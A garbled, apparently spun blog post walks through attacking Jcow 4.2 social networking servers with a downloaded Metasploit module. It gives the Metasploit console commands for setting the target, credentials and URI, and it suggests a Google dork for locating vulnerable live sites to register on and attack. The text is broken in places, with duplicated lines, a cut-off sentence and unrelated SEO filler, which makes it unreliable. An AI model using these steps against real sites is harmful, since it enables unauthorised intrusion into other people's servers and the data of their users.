This is about : 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
And this article : 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
Article DNS Hacking, Article Learn Hacking,
4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution
After very long times I didn't write about hacking webserver, today "again" when surfing around I've found that Jcow Social networking engine can be exploited and the exploit ranking marked as "excellent".So actually, what happen when you have this Jcow vulnerable version??The simple thing is the attacker can go through your web server directory and doing everything there. For example, if you hosting your Jcowvulnerable version(on insecure hosting also

In this example, let's say I have a Jcow vulnerable web server in IP address 192.168.8.94. Actually, it's better to try installing your own web server, but if you want to find out Jcow in the wild you can search through Google dork "intext: Powered by Jcow 4.2.0" and register as the normal user there. In this tutorial I have already registered as username: victim and password also victim

Okay, I hope you understand what I say above

![]() |
4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution |
Level: Medium
Victim Server: work fine if victim uses Windows XP SP3
Victim vulnerable application: JCow 4.2
Attacker O.S: obviously you need Backtrack 5 R1
Requirement :
Here only you need bellow two item.
Which is your actual need.
2.# Jcow.rb exploit mediafire.com
Now lets start this article.
4 Steps Hacking Jcow Social Networking Web Server via ArbitraryCode Execution Process:
1.#, first of all, you simply Copy thedownloaded cow.rb exploit from the
download link above and copy it into /pentest/exploits/framework/modules/exploits/remote/ folder(for example see the command below).
cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/
now you see the text "framework" in blue color it's only because I'm using Backtrack 5 R1 and using Metasploit
v4.0.1, so the name depended on
your Metasploit version, maybe on your
the computer can be "framework3" or
"framework2" so on..so don't have
confused.
2.# now when you copy successfully
2.# now when you copy successfully
after that, simply Open your Metasploit
console and then use the exploit you just added before see bellow
msf > use exploit/remote/jcow
next step we need to view the available
switch for this exploit by running the show
options command, and then configured it(see the text with red color).


Importent:::?msf exploit(jcow) > set rhost 192.168.8.94 --> set the target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim --> set the username
username => victim
msf exploit(jcow) > set password victim --> set the password
password => victim
msf exploit(jcow) > set uri jcow --> only if jcow not in/directory fill it here
uri => jcow
Set URI can be used if cow was not
installed on web server main directory,
for example http://web-server.com/jcow.
4#. now your work has been almost
done , After everything was set up
successfully, the next thing to do was
exploiting or running the exploit by using
exploit command.
Articles 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution finished we discussed
A few of our information about the 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution, I hope you can exploit carefully
No've You've finished reading an article on 4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution and many articles about modern home in our blog this, please read it. and url link of this article is http://liveeconcerts.blogspot.com/2016/01/4-steps-hacking-jcow-social-networking.html Hopefully discussion articles on provide more knowledge about the world of tech gadgets.
Tag : DNS Hacking, Learn Hacking,
0 Response to "4 Steps Hacking Jcow Social Networking Web Server via Arbitrary Code Execution"
Post a Comment